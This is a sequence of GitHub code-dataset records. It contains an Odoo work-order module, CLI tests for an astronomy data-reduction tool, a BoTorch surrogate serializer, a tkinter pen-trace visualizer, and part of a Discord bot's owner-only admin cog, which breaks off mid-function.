required=True),\n\t\t'quantity' : fields.float('Quantity', digits_compute= dp.get_precision('Account')),\n\t\t'uom_id' : fields.many2one('product.uom', 'UoS'),\n\t\t'unit_price' : fields.float('Price Unit', digits_compute= dp.get_precision('Account')),\n\t\t'amount_subtotal' : fields.function(_get_amount_subtotal, type='float', digits_compute= dp.get_precision('Account'), string='Amount Subtotal'),\n\t\t'invoice_line_ids' : fields.one2many('account.invoice.line', 'work_order_id', 'Invoice Lines'),\n\t\t'progress_payment_rate': fields.function(_progress_payment_rate, string='Progress Payment', type='float', help=\"Percent of Work Order's payment closed according to the total of outstanding amount to pay\",\n\t\t\tstore = {\n\t\t\t\t'project.work.order': (lambda self,cr,uid,ids,context={}:ids, ['invoice_line_ids','unit_price','quantity'], 10),\n\t\t\t}),\n\t}\n\n\t_defaults = {\n\t\t'date': lambda *a: time.strftime('%Y-%m-%d'),\n\t}\n\t\nproject_work_order()\n\nclass project_task(osv.osv):\n\t_inherit = \"project.task\"\n\n\t# def get_user_related_details(self, cr, uid, user_id):\n\t# \tres = {}\n\t# \temp_obj = self.pool.get('hr.employee')\n\t# \temp_id = emp_obj.search(cr, uid, [('user_id', '=', user_id)])\n\t# \tif not emp_id:\n\t# \t\tuser_name = self.pool.get('res.users').read(cr, uid, [user_id], ['name'])[0]['name']\n\t# \t\traise osv.except_osv(_('Bad Configuration!'),\n\t# \t\t\t _('Please define employee for user \"%s\". 
You must create one.')% (user_name,))\n\t# \temp = emp_obj.browse(cr, uid, emp_id[0])\n\t# \tif not emp.product_id:\n\t# \t\traise osv.except_osv(_('Bad Configuration!'),\n\t# \t\t\t _('Please define product and product category property account on the related employee.\\nFill in the HR Settings tab of the employee form.'))\n\n\t# \tif not emp.journal_id:\n\t# \t\traise osv.except_osv(_('Bad Configuration!'),\n\t# \t\t\t _('Please define journal on the related employee.\\nFill in the timesheet tab of the employee form.'))\n\n\t# \tacc_id = emp.product_id.property_account_expense.id\n\t# \tif not acc_id:\n\t# \t\tacc_id = emp.product_id.categ_id.property_account_expense_categ.id\n\t# \t\tif not acc_id:\n\t# \t\t\traise osv.except_osv(_('Bad Configuration!'),\n\t# \t\t\t\t\t_('Please define product and product category property account on the related employee.\\nFill in the timesheet tab of the employee form.'))\n\n\t# \tres['product_id'] = emp.product_id.id\n\t# \tres['journal_id'] = emp.journal_id.id\n\t# \tres['general_account_id'] = acc_id\n\t# \tres['product_uom_id'] = emp.product_id.uom_id.id\n\t# \treturn res\n\n\tdef create(self, cr, uid, vals, *args, **kwargs):\n\t\t# timesheet_obj = self.pool.get('hr.analytic.timesheet')\n\t\twork_order_obj = self.pool.get('project.work.order')\n\t\t# task_obj = self.pool.get('project.task')\n\t\tproject_obj = self.pool.get('project.project')\n\t\tuom_obj = self.pool.get('product.uom')\n\t\tproduct_obj = self.pool.get('product.product')\n\n\t\tvals_line = {} #parameters for work order\n\t\tcontext = kwargs.get('context', {})\n\t\tif not context.get('no_analytic_entry',False):\n\t\t\t# task_obj = task_obj.browse(cr, uid, vals['task_id'])\n\t\t\tproject_obj = project_obj.browse(cr, uid, vals['project_id'])\n\t\t\tvals_line['project_id'] = project_obj.id\n\t\t\t# result = self.get_user_related_details(cr, uid, vals.get('user_id', uid))\n\t\t\tvals_line['name'] = '%s: %s' % (tools.ustr(project_obj.name), tools.ustr(vals['name'] or '/'))\n\t\t\t# vals_line['user_id'] = vals['user_id']\n\n\t\t\tproduct_ids = product_obj.search(cr, uid, [('type','=','service')])\n\t\t\tif product_ids:\n\t\t\t\tproduct = product_obj.browse(cr, uid, product_ids[0])\n\t\t\t\tvals_line['product_id'] = product.id\n\t\t\t\tvals_line['uom_id'] = product.uom_id.id\n\t\t\telse:\n\t\t\t\traise osv.except_osv(_('Bad Configuration!'),\n\t\t\t\t\t_('Please define product and product category of Service Product in your Product Masters'))\n\t\t\t# vals_line['date'] = vals['date'][:10]\n\n\t\t\tvals_line['unit_price'] = 0.0\n\t\t\tvals_line['quantity'] = 1.0\n\t\t\t\n\t\t\t# acc_id = task_obj.project_id and task_obj.project_id.analytic_account_id.id or False\n\t\t\tif project_obj.is_work_order:\n\t\t\t\t# vals_line['account_id'] = acc_id\n\t\t\t\t# res = timesheet_obj.on_change_account_id(cr, uid, False, acc_id)\n\t\t\t\t# if res.get('value'):\n\t\t\t\t# \tvals_line.update(res['value'])\n\t\t\t\t# vals_line['general_account_id'] = result['general_account_id']\n\t\t\t\t# vals_line['journal_id'] = result['journal_id']\n\t\t\t\t# vals_line['amount'] = 0.0\n\t\t\t\t# vals_line['product_uom_id'] = result['product_uom_id']\n\t\t\t\t# amount = vals_line['unit_amount']\n\t\t\t\t# prod_id = vals_line['product_id']\n\t\t\t\t# unit = False\n\t\t\t\t# timeline_id = timesheet_obj.create(cr, uid, vals=vals_line, context=context)\n\t\t\t\twork_order_id = work_order_obj.create(cr, uid, vals=vals_line, context=context)\n\n\t\t\t\t# Compute based on pricetype\n\t\t\t\t# amount_unit = 
timesheet_obj.on_change_unit_amount(cr, uid, timeline_id,\n\t\t\t\t# \tprod_id, amount, False, unit, vals_line['journal_id'], context=context)\n\t\t\t\t# if amount_unit and 'amount' in amount_unit.get('value',{}):\n\t\t\t\t# \tupdv = { 'amount': amount_unit['value']['amount'] }\n\t\t\t\t# \ttimesheet_obj.write(cr, uid, [timeline_id], updv, context=context)\n\t\t\t\tvals['work_order_id'] = work_order_id\n\t\treturn super(project_task,self).create(cr, uid, vals, *args, **kwargs)\n\n\tdef write(self, cr, uid, ids, vals, context=None):\n\t\t\"\"\"\n\t\tWhen a project task gets updated, update its related work order as well.\n\t\t\"\"\"\n\t\tif context is None:\n\t\t\tcontext = {}\n\t\t# timesheet_obj = self.pool.get('hr.analytic.timesheet')\n\t\twork_order_obj = self.pool.get('project.work.order')\n\t\tuom_obj = self.pool.get('product.uom')\n\t\tproduct_obj = self.pool.get('product.product')\n\t\tresult = {}\n\n\t\tif isinstance(ids, (long, int)):\n\t\t\tids = [ids]\n\n\t\tfor task in self.browse(cr, uid, ids, context=context):\n\t\t\tline_id = task.work_order_id\n\t\t\tif not line_id:\n\t\t\t\t# if the related work order was deleted, work_order_id will become\n\t\t\t\t# null because of the foreign key on-delete=set null\n\t\t\t\tcontinue\n\n\t\t\tvals_line = {}\n\t\t\tif 'name' in vals:\n\t\t\t\tvals_line['name'] = '%s: %s' % (tools.ustr(task.project_id.name), tools.ustr(vals['name'] or '/')) # use the project name, mirroring create()\n\t\t\t# if 'user_id' in vals:\n\t\t\t# \tvals_line['user_id'] = vals['user_id']\n\t\t\t# if 'date' in vals:\n\t\t\t# \tvals_line['date'] = vals['date'][:10]\n\t\t\t# if 'hours' in vals:\n\t\t\t# \tvals_line['unit_amount'] = vals['hours']\n\t\t\t# \tprod_id = vals_line.get('product_id', line_id.product_id.id) # False may be set\n\n\t\t\t# \t# Put user related details in analytic timesheet values\n\t\t\t# \tdetails = self.get_user_related_details(cr, uid, vals.get('user_id', task.user_id.id))\n\t\t\t# \tfor field in ('product_id', 'general_account_id', 'journal_id', 'product_uom_id'):\n\t\t\t# \t\tif details.get(field, False):\n\t\t\t# \t\t\tvals_line[field] = details[field]\n\n\t\t\t# \t# Check if user's default UOM differs from product's UOM\n\t\t\t# \tuser_default_uom_id = self.pool.get('res.users').browse(cr, uid, uid).company_id.project_time_mode_id.id\n\t\t\t# \tif details.get('product_uom_id', False) and details['product_uom_id'] != user_default_uom_id:\n\t\t\t# \t\tvals_line['unit_amount'] = uom_obj._compute_qty(cr, uid, user_default_uom_id, vals['hours'], details['product_uom_id'])\n\n\t\t\t# \t# Compute based on pricetype\n\t\t\t# \tamount_unit = timesheet_obj.on_change_unit_amount(cr, uid, line_id.id,\n\t\t\t# \t\tprod_id=prod_id, company_id=False,\n\t\t\t# \t\tunit_amount=vals_line['unit_amount'], unit=False, journal_id=vals_line['journal_id'], context=context)\n\n\t\t\t# \tif amount_unit and 'amount' in amount_unit.get('value',{}):\n\t\t\t# \t\tvals_line['amount'] = amount_unit['value']['amount']\n\n\t\t\tif vals_line:\n\t\t\t\twork_order_obj.write(cr, uid, [line_id.id], vals_line, context=context)\n\n\t\treturn super(project_task,self).write(cr, uid, ids, vals, context)\n\n\tdef unlink(self, cr, uid, ids, *args, **kwargs):\n\t\twork_order_obj = self.pool.get('project.work.order')\n\t\two_ids = []\n\t\tfor task in self.browse(cr, uid, ids):\n\t\t\tif task.work_order_id:\n\t\t\t\two_ids.append(task.work_order_id.id)\n\t\t# Delete the related work orders as well when deleting tasks.\n\t\tif wo_ids:\n\t\t\twork_order_obj.unlink(cr, uid, wo_ids, *args, **kwargs)\n\t\treturn 
super(project_task,self).unlink(cr, uid, ids, *args, **kwargs)\n\t\n\t_columns={\n\t\t'work_order_id':fields.many2one('project.work.order','Related Work Order', ondelete='set null'),\n\t}\nproject_task()","repo_name":"hendrasaputra0501/btxjalan","sub_path":"ad_project_work_order/project_work_order.py","file_name":"project_work_order.py","file_ext":"py","file_size_in_byte":10903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4206929542","text":"import textwrap\n\nfrom click.testing import CliRunner\n\nfrom musered.__main__ import cli\n\n\ndef test_list_datasets(mr):\n runner = CliRunner()\n result = runner.invoke(cli, [\"info\", \"--datasets\"])\n assert result.exit_code == 0\n assert result.output == textwrap.dedent(\n \"\"\"\\\n Datasets:\n - IC4406 : 6 exposures\n \"\"\"\n )\n\n\ndef test_list_runs(mr):\n runner = CliRunner()\n result = runner.invoke(cli, [\"info\", \"--runs\"])\n assert result.exit_code == 0\n assert result.output == textwrap.dedent(\n \"\"\"\\\n Runs:\n - GTO17 : 2017-04-01 - 2017-06-30, 6 exposures (1 flagged)\n \"\"\"\n )\n\n\ndef test_list_nights(mr):\n runner = CliRunner()\n result = runner.invoke(cli, [\"info\", \"--nights\"])\n assert result.exit_code == 0\n assert result.output == textwrap.dedent(\n \"\"\"\\\n Nights:\n - 2017-04-23\n - 2017-06-13\n - 2017-06-15\n - 2017-06-17\n - 2017-06-18\n - 2017-06-19\n - 2017-10-25\n - 2017-10-26\n \"\"\"\n )\n\n\ndef test_list_exposures(mr):\n runner = CliRunner()\n result = runner.invoke(cli, [\"info\", \"--exps\"])\n assert result.exit_code == 0\n assert result.output == textwrap.dedent(\n \"\"\"\\\n Exposures:\n - IC4406\n - 2017-06-16T01:34:56.867\n - 2017-06-16T01:37:47.867\n - 2017-06-16T01:40:40.868\n - 2017-06-16T01:43:32.868\n - 2017-06-16T01:46:25.866\n - 2017-06-16T01:49:19.866\n \"\"\"\n )\n\n\ndef test_list_calibs(mr):\n runner = CliRunner()\n result = runner.invoke(cli, [\"info\", \"--calibs\"])\n assert result.exit_code == 0\n assert result.output == textwrap.dedent(\n \"\"\"\\\n Calibrations:\n - BIAS\n - 2017-06-16T10:40:27\n - 2017-06-18T11:03:09\n - 2017-06-20T10:38:50\n - FLAT,LAMP\n - 2017-06-16T12:15:46\n - 2017-06-18T12:35:49\n - 2017-06-19T12:04:11\n - FLAT,LAMP,ILLUM\n - 2017-06-16T01:24:12\n - 2017-06-16T01:56:46\n - 2017-06-16T03:07:45\n - 2017-06-18T23:24:33\n - 2017-06-19T08:20:55\n - FLAT,SKY\n - 2017-06-18T22:04:55\n - OBJECT\n - 2017-06-16T01:34:08\n - STD\n - 2017-06-19T09:31:18\n - WAVE\n - 2017-06-16T12:32:03\n - 2017-06-18T12:51:47\n - 2017-06-19T12:20:06\n \"\"\"\n )\n\n\ndef test_info(mr):\n runner = CliRunner()\n result = runner.invoke(cli, [\"info\"])\n assert result.exit_code == 0\n assert result.output == textwrap.dedent(\n \"\"\"\\\n Reduction version 0.1\n 155 files\n\n Datasets:\n - IC4406 : 6 exposures\n\n Runs:\n - GTO17 : 2017-04-01 - 2017-06-30, 6 exposures (1 flagged)\n\n Raw data:\n\n name BIAS FLAT,LAMP FLAT,LAMP,ILLUM FLAT,SKY IC4406 STD WAVE\n ---------- ---- --------- --------------- -------- ------ --- ----\n 2017-06-15 11 11 3 -- 6 -- 15\n 2017-06-17 11 11 -- -- -- -- 15\n 2017-06-18 -- 11 2 4 -- 1 15\n 2017-06-19 11 -- -- -- -- -- --\n\n Processed calib data:\n\n name bias flat lsf scibasic standard twilight wavecal\n ---------- ---- ---- --- -------- -------- -------- -------\n 2017-06-15 1 3 1 -- -- -- 2\n 2017-06-17 1 3 1 -- -- -- 2\n 2017-06-18 -- 3 1 1 4 2 2\n 2017-06-19 1 -- -- -- -- -- --\n\n Processed science data:\n\n name mpdaf_combine exp_align ... 
scipost_rec zap\n ----------------------- ------------- --------- ... ----------- ---\n 2017-06-16T01:34:56.867 -- -- ... 2 --\n 2017-06-16T01:37:47.867 -- -- ... 2 --\n 2017-06-16T01:40:40.868 -- -- ... 2 --\n 2017-06-16T01:43:32.868 -- -- ... 2 --\n 2017-06-16T01:46:25.866 -- -- ... 2 --\n 2017-06-16T01:49:19.866 -- -- ... 2 --\n IC4406_drs -- -- ... -- --\n IC4406_mpdaf 5 -- ... -- 4\n OFFSET_LIST_drs -- 2 ... -- --\n \"\"\"\n )\n\n\ndef test_info_exp(mr, caplog):\n # test missing exp/night\n mr.set_loglevel(\"DEBUG\")\n mr.info_exp(\"2017-06-20\")\n assert caplog.records[0].message == \"2017-06-20 not found\"\n\n runner = CliRunner()\n result = runner.invoke(cli, [\"info-exp\", \"2017-06-16T01:34:56.867\"])\n assert result.exit_code == 0\n out = result.output.splitlines()\n for line in [\n \"★ GTO logs:\",\n \"★ Weather Conditions:\",\n \"★ Recipe: muse_scibasic\",\n \"★ Recipe: muse_scipost_rec\",\n \"★ Recipe: muse_scipost\",\n \"★ Recipe: muse_scipost_make_cube\",\n ]:\n assert line in out\n\n\ndef test_info_night(mr):\n runner = CliRunner()\n result = runner.invoke(\n cli, [\"info-exp\", \"--night\", \"2017-06-15\", \"--recipe\", \"bias\"]\n )\n assert result.exit_code == 0\n out = result.output.splitlines()\n assert \"★ Recipe: muse_bias\" in out\n\n result = runner.invoke(cli, [\"info-exp\", \"--night\", \"2017-06-15\", \"--short\"])\n assert result.exit_code == 0\n out = result.output.splitlines()\n assert \"★ Recipe: muse_bias\" in out\n\n\ndef test_info_raw(mr, capsys, caplog):\n runner = CliRunner()\n result = runner.invoke(cli, [\"info-raw\", \"night:2017-06-17\"])\n assert result.exit_code == 0\n out = result.output.splitlines()\n assert len(out) == 39\n\n result = runner.invoke(cli, [\"info-raw\", \"night:2017-06-17\", \"OBJECT:BIAS\"])\n assert result.exit_code == 0\n out = result.output.splitlines()\n assert len(out) == 13\n\n # test missing exp/night\n mr.info_raw(night=\"2017-06-20\")\n assert caplog.records[-1].message == \"Could not find exposures\"\n\n\ndef test_info_qc(mr):\n runner = CliRunner()\n result = runner.invoke(\n cli, [\"info\", \"--qc\", \"MASTER_FLAT\", \"--date\", \"2017-06-16T12:15:46\"]\n )\n assert result.exit_code == 0\n assert len(result.output.splitlines()) == 29 # 24 rows + header + expname\n\n result = runner.invoke(\n cli, [\"info\", \"--qc\", \"MASTER_FLAT\", \"--date\", \"2017-06-16T*\"]\n )\n assert result.exit_code == 0\n assert len(result.output.splitlines()) == 29 # 24 rows + header + expname\n\n result = runner.invoke(cli, [\"info\", \"--qc\", \"MASTER_FLAT\"])\n assert result.exit_code == 0\n assert len(result.output.splitlines()) == 29 * 3 # 3 nights\n\n\ndef test_info_warnings(mr):\n runner = CliRunner()\n result = runner.invoke(cli, [\"info-warnings\"])\n assert result.exit_code == 0\n assert result.output == textwrap.dedent(\n \"\"\"\\\n name muse_scipost muse_scipost_make_cube muse_wavecal\n ----------------------- ------------ ---------------------- ------------\n 2017-06-16T01:34:56.867 1 3 --\n 2017-06-16T01:37:47.867 1 3 --\n 2017-06-16T01:40:40.868 1 -- --\n 2017-06-16T01:43:32.868 1 -- --\n 2017-06-16T01:46:25.866 1 -- --\n 2017-06-16T01:49:19.866 1 3 --\n 2017-06-19T12:20:06 -- -- 5\n \"\"\"\n )\n\n result = runner.invoke(cli, [\"info-warnings\", \"-m\", \"list\", \"-r\", \"muse_wavecal\"])\n assert result.exit_code == 0\n assert result.output.splitlines() == [\n \"recipe_name ... log_file \",\n \"------------ ... --------------------------------------------------------------\",\n \"muse_wavecal ... 
./reduced/0.1/logs/muse_wavecal-2018-11-14T20:03:11.243195.log\",\n ]\n\n result = runner.invoke(\n cli, [\"info-warnings\", \"-m\", \"detail\", \"-d\", \"2017-06-16T01:46:25.866\"]\n )\n # cannot be fully tested since log file is not in the test directory\n assert result.exit_code == 1\n assert result.output.strip() == \"muse_scipost, 2017-06-16T01:46:25.866, 1 warnings\"\n","repo_name":"musevlt/musered","sub_path":"tests/test_info.py","file_name":"test_info.py","file_ext":"py","file_size_in_byte":8522,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"18194262522","text":"import base64\nimport io\n\nimport numpy as np\nimport pandas as pd\nimport torch\nfrom botorch.models.transforms.input import ChainedInputTransform, FilterFeatures\n\nfrom bofire.data_models.surrogates.api import BotorchSurrogate as DataModel\nfrom bofire.surrogates.surrogate import Surrogate\nfrom bofire.utils.torch_tools import tkwargs\n\n\nclass BotorchSurrogate(Surrogate):\n def __init__(\n self,\n data_model: DataModel,\n **kwargs,\n ):\n super().__init__(data_model=data_model, **kwargs)\n\n def _predict(self, transformed_X: pd.DataFrame):\n # transform to tensor\n X = torch.from_numpy(transformed_X.values).to(**tkwargs)\n with torch.no_grad():\n preds = self.model.posterior(X=X, observation_noise=True).mean.cpu().detach().numpy() # type: ignore\n stds = np.sqrt(self.model.posterior(X=X, observation_noise=True).variance.cpu().detach().numpy()) # type: ignore\n return preds, stds\n\n @property\n def is_compatibilized(self) -> bool:\n if self.is_fitted:\n if hasattr(self.model, \"input_transform\"):\n if self.model.input_transform is not None: # type: ignore\n if isinstance(self.model.input_transform, FilterFeatures): # type: ignore\n return True\n if isinstance(self.model.input_transform, ChainedInputTransform): # type: ignore\n if \"tcompatibilize\" in self.model.input_transform.keys(): # type: ignore\n return True\n return False\n\n def decompatibilize(self):\n if self.is_fitted:\n if self.is_compatibilized:\n if isinstance(self.model.input_transform, FilterFeatures): # type: ignore\n self.model.input_transform = None # type: ignore\n elif isinstance(self.model.input_transform, ChainedInputTransform): # type: ignore\n self.model.input_transform = self.model.input_transform.tf2 # type: ignore\n else:\n raise ValueError(\"Undefined input transform structure detected.\")\n\n def _prepare_for_dump(self):\n \"\"\"Decompatibilize the model before the dump\"\"\"\n self.decompatibilize()\n\n def _dumps(self) -> str:\n \"\"\"Dumps the actual model to a string via pickle as this is not directly json serializable.\"\"\"\n # empty internal caches to get smaller dumps\n self.model.prediction_strategy = None\n buffer = io.BytesIO()\n torch.save(self.model, buffer)\n return base64.b64encode(buffer.getvalue()).decode()\n\n def loads(self, data: str):\n \"\"\"Loads the actual model from a base64 encoded pickle bytes object and writes it to the `model` attribute.\"\"\"\n buffer = io.BytesIO(base64.b64decode(data.encode()))\n self.model = torch.load(buffer)\n","repo_name":"experimental-design/bofire","sub_path":"bofire/surrogates/botorch.py","file_name":"botorch.py","file_ext":"py","file_size_in_byte":2863,"program_lang":"python","lang":"en","doc_type":"code","stars":83,"dataset":"github-code","pt":"37"} +{"seq_id":"8241386103","text":"import argparse\nimport os\n\nfrom tkinter import *\nfrom PIL import Image, ImageTk, ImageGrab\nfrom functools import partial\n\nfrom utils 
import process_skeleton\nfrom trace_reconstruction import *\n\n\ndef _exit(window):\n\twindow.destroy()\n\texit()\n\n\ndef close(window):\n\twindow.destroy()\n\n\ndef center_window(window, width=300, height=200):\n\tscreen_width = window.winfo_screenwidth()\n\tscreen_height = window.winfo_screenheight()\n\n\tx = (screen_width/2) - (width/2)\n\ty = (screen_height/2) - (height/2)\n\n\twindow.geometry('+%d+%d' % (x, y))\n\n\nclass PrintTrace:\n\tdef __init__(self, trace, strokes, rate):\n\t\tself.cur_stroke = 0\n\t\tself.cur_idx = 0\n\t\tself.trace = trace\n\t\tself.strokes = strokes\n\t\tself.rate = rate\n\t\t# self.save_idx = 0\n\n\tdef __call__(self, event, canvas):\n\t\t# x = canvas.winfo_rootx() * 2 + canvas.winfo_x()\n\t\t# y = canvas.winfo_rooty() * 2 + canvas.winfo_y()\n\t\t# x1 = x + canvas.winfo_width() * 2\n\t\t# y1 = y + canvas.winfo_height() * 2\n\t\t# box = (x, y, x1, y1)\n\t\t#\n\t\t# grabcanvas = ImageGrab.grab(bbox=box)\n\t\t# grabcanvas = grabcanvas.convert('RGB')\n\t\t# grabcanvas.save(f\"out_{self.save_idx}.jpg\")\n\t\t# self.save_idx += 1\n\n\t\tif self.cur_stroke < len(self.trace):\n\t\t\ttrace = self.trace[self.cur_stroke][self.cur_idx:self.cur_idx + self.rate]\n\n\t\t\tif self.strokes[self.cur_stroke] == 'simple':\n\t\t\t\tcolor = 'red'\n\t\t\telif self.strokes[self.cur_stroke] == 'cyclic':\n\t\t\t\tcolor = 'blue'\n\t\t\telif self.strokes[self.cur_stroke] == 'vertical':\n\t\t\t\tcolor = 'green'\n\t\t\telif self.strokes[self.cur_stroke] == 'semivertical':\n\t\t\t\tcolor = 'yellow'\n\n\t\t\tcanvas.create_line(*trace, fill=color, width=2.5)\n\n\t\t\tif self.cur_idx + self.rate >= len(self.trace[self.cur_stroke]):\n\t\t\t\tself.cur_stroke += 1\n\t\t\t\tself.cur_idx = 0\n\t\t\telse:\n\t\t\t\tself.cur_idx += self.rate - 1\n\n\ndef build_trace(skeleton_path, scale):\n\tnodes, edges = process_skeleton(skeleton_path)\n\tskeleton_graph = SkeletonGraph(nodes, edges)\n\tmeta_graph = MetaGraph(skeleton_graph)\n\ttrace_reconstructor = TraceReconstructor(skeleton_graph, meta_graph)\n\ttrace = trace_reconstructor.trace()\n\tstroke_trace = trace_reconstructor.stroke_trace()\n\n\tskeleton_graph = skeleton_graph.nx_graph\n\n\tnode_trace = []\n\tstroke_names = []\n\n\tfor i in range(len(trace)):\n\t\tcc_stroke_trace, cc_trace = stroke_trace[i], trace[i]\n\t\tfor stroke in cc_trace:\n\t\t\tnode_trace.append(\n\t\t\t\t[(skeleton_graph.nodes[v]['x'] * scale, skeleton_graph.nodes[v]['y'] * scale) for v in stroke])\n\t\tstroke_names += [stroke.name for stroke in cc_stroke_trace]\n\n\treturn node_trace, stroke_names\n\n\ndef print_words(images_path, skeletons_path, rate=10):\n\n\tif os.path.isdir(images_path):\n\t\timgs = [os.path.join(images_path, f) for f in os.listdir(images_path) if f[-4:] == '.png' or f[-4:] == '.bmp']\n\telse:\n\t\timgs = [images_path]\n\n\tfor img_path in imgs:\n\t\timg = Image.open(img_path)\n\n\t\t# create window\n\t\twindow = Tk()\n\t\twindow.title(img_path)\n\n\t\tw = window.winfo_screenwidth() // 2\n\n\t\tscale = w / img.size[0]\n\t\th = int(scale * img.size[1])\n\n\t\timg = img.resize((w, h))\n\t\timg = ImageTk.PhotoImage(img)\n\n\t\tcenter_window(window, w, h)\n\n\t\tc = Canvas(window, width=w, height=h)\n\t\tc.create_image(0, 0, anchor=NW, image=img)\n\t\tc.pack(fill=BOTH, expand=1)\n\n\t\t# process skeleton\n\t\tbase = os.path.basename(img_path)\n\t\timg_name, _ = os.path.splitext(base)\n\t\tskeleton_path = os.path.join(skeletons_path, img_name + '.txt')\n\t\tnode_trace, stroke_names = build_trace(skeleton_path, scale)\n\n\t\tpt = PrintTrace(node_trace, 
stroke_names, rate)\n\n\t\tfunc_print = partial(pt, canvas=c)\n\t\tfunc_close = partial(close, window=window)\n\t\tfunc_exit = partial(_exit, window=window)\n\n\t\tButton(window, text=\"Close\", command=func_exit).pack(side=RIGHT, padx=5, pady=5)\n\t\tButton(window, text=\"Next\", command=func_close).pack(side=RIGHT)\n\t\twindow.bind('<Button-1>', func_print) # the original event sequence was stripped from the source; a left-click binding is assumed\n\n\t\twindow.mainloop()\n\n\nif __name__ == \"__main__\":\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('--images-path', required=True)\n\tparser.add_argument('--skeletons-path', required=True)\n\tparser.add_argument('--rate', default=30, type=int, required=False) # coerce command-line input to int\n\targs = parser.parse_args()\n\tprint_words(args.images_path, args.skeletons_path, args.rate)\n","repo_name":"skryzhanovskaya/pen_trace_reconstruction","sub_path":"visual.py","file_name":"visual.py","file_ext":"py","file_size_in_byte":4070,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"29054639777","text":"import discord\nfrom discord.ext import commands\nfrom discord.ext.commands import bot_has_permissions\nimport ast\nimport sys\nimport os\n\n# These imports are just for the run command, for convenience\nimport subprocess\nimport datetime\nimport re\nimport json\nimport time\nimport requests\nimport random\n\n\ndef insert_returns(body):\n # insert return stmt if the last expression is an expression statement\n if isinstance(body[-1], ast.Expr):\n body[-1] = ast.Return(body[-1].value)\n ast.fix_missing_locations(body[-1])\n\n # for if statements, we insert returns into the body and the or else\n if isinstance(body[-1], ast.If):\n insert_returns(body[-1].body)\n insert_returns(body[-1].orelse)\n\n # for with blocks, again we insert returns into the body\n if isinstance(body[-1], ast.With):\n insert_returns(body[-1].body)\n\n\nclass Owner(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n @commands.is_owner()\n @commands.command()\n async def react_henwee(self, ctx, user=411536312961597440):\n with open(\"storage/all_message_ids.json\", \"r\") as f:\n file = json.load(f)\n\n for x in file[str(user)][\"messages\"]:\n message = await ctx.channel.fetch_message(x)\n await message.add_reaction(\"\") # the reaction emoji was stripped from the source\n\n file = {\n \"368423564229083137\": {\"messages\": []},\n \"411536312961597440\": {\"messages\": []},\n }\n\n with open(\"storage/all_message_ids.json\", \"w\") as f:\n json.dump(file, f)\n\n @commands.is_owner()\n @commands.command(name=\"getstatus\")\n async def getstatus(self, ctx):\n await ctx.send(ctx.author.activities)\n \n @commands.is_owner()\n @commands.command(name=\"nickname\")\n async def change_nickname_admin(self, ctx, member: discord.Member, *, nickname=None):\n message = ctx.message\n await self.bot.http.delete_message(message.channel.id, message.id)\n\n if nickname is None:\n await ctx.send(\"please give me a nickname to change it to\")\n return\n\n else:\n try:\n member = ctx.guild.get_member(int(member.id))\n await member.edit(nick=nickname)\n await ctx.send(\n f\"Nickname was changed to {nickname}\\nbtw if anyone is wondering blame Avery for coming up with the idea for this :))))\",\n delete_after=3,\n )\n\n except Exception as e:\n await ctx.send(f\"{e}\", delete_after=5)\n\n @commands.is_owner()\n @commands.command(name=\"mepurge\", brief=\"Clears messages equal to the amount specified \")\n @bot_has_permissions(manage_messages=True)\n async def purge(self, ctx, amount=0, shut=\"shutupplz\"):\n if amount == 0:\n await ctx.send(\"please specify an amount\")\n return\n if 0 < amount <= 
250:\n channel = ctx.message.channel\n messages = []\n async for message in channel.history(limit=amount + 1):\n messages.append(message)\n\n await channel.delete_messages(messages)\n if shut == \"shutupplz\":\n await ctx.send(\n f\"{amount} messages have been purged by {ctx.message.author.mention}\",\n delete_after=10,\n )\n else:\n pass\n\n else:\n await ctx.send(\"The limit provided is not within acceptable bounds.\")\n\n @commands.is_owner()\n @commands.command()\n async def load(self, ctx, extension):\n await self.bot.load_extension(f\"cogs.{extension}\") # extension management is async in discord.py 2.0\n await ctx.send(f\"{extension} was loaded\")\n\n @commands.is_owner()\n @commands.command()\n async def unload(self, ctx, extension):\n await self.bot.unload_extension(f\"cogs.{extension}\")\n await ctx.send(f\"{extension} was unloaded\")\n\n @commands.command()\n @commands.is_owner()\n async def reload(self, ctx: commands.Context, cog: str):\n \"\"\"\n Reloads a cog and updates changes to it\n \"\"\"\n try:\n await self.bot.reload_extension(\"cogs.\" + cog)\n self.bot.dispatch(\"load\", cog)\n except Exception as error:\n await ctx.send(f\"```py\\n{error}```\")\n return\n await ctx.send(\"✅\")\n print(f\"------------Reloaded {cog}------------\")\n\n @commands.is_owner()\n @commands.command(name=\"restart\", aliases=[\"reboot\"])\n async def restart(self, ctx):\n try:\n await self.bot.change_presence(\n status=discord.Status.idle,\n activity=discord.Activity(\n type=discord.ActivityType.watching,\n name=\"restarting - won't respond\",\n ),\n )\n await ctx.send(\"Restarting bot...\")\n os.execv(sys.executable, [\"python3\"] + sys.argv)\n except Exception as error:\n await ctx.send(f\"```py\\n{error}```\")\n return\n\n @commands.is_owner()\n @commands.command(name=\"shutdown\", aliases=[\"poweroff\", \"turnoff\"])\n async def shutdown(self, ctx):\n try:\n await ctx.send(\"turning off the bot...\")\n await self.bot.change_presence(\n status=discord.Status.idle,\n activity=discord.Activity(\n type=discord.ActivityType.watching,\n name=\"turning offline - won't respond\",\n ),\n )\n await self.bot.close()\n print(\"closed using !shutdown command\")\n except Exception as error:\n await ctx.send(f\"```py\\n{error}```\")\n return\n\n @commands.is_owner()\n @commands.command(name=\"change_status\")\n async def change_status_owner(self, ctx, *, input):\n try:\n await self.bot.change_presence(\n status=discord.Status.idle,\n activity=discord.Activity(type=discord.ActivityType.watching, name=f\"{input}\"),\n )\n except Exception as error:\n await ctx.send(f\"```py\\n{error}```\")\n\n @commands.is_owner()\n @commands.command(\n name=\"addtofunny\",\n aliases=[\n \"atf\",\n \"makefunny\",\n \"shitpostadd\",\n \"addshitpost\",\n \"jsonadd\",\n \"addjson\",\n ],\n brief=\"adds the specified thing to shitpost.json\",\n )\n async def addtofunnylist(self, ctx, *, funny=None): # cog commands need self as the first parameter\n with open(\"./storage/shitpost.json\", \"r\") as f:\n shitposts = json.load(f)\n\n if funny is None:\n print(\"funny is None\")\n await ctx.send(\"funny is `None`\")\n return # bail out instead of appending None to the list\n\n shitposts[\"list\"].append(f\"{funny}\")\n await ctx.send(f\"added {funny} to list\")\n print(f\"added {funny} to 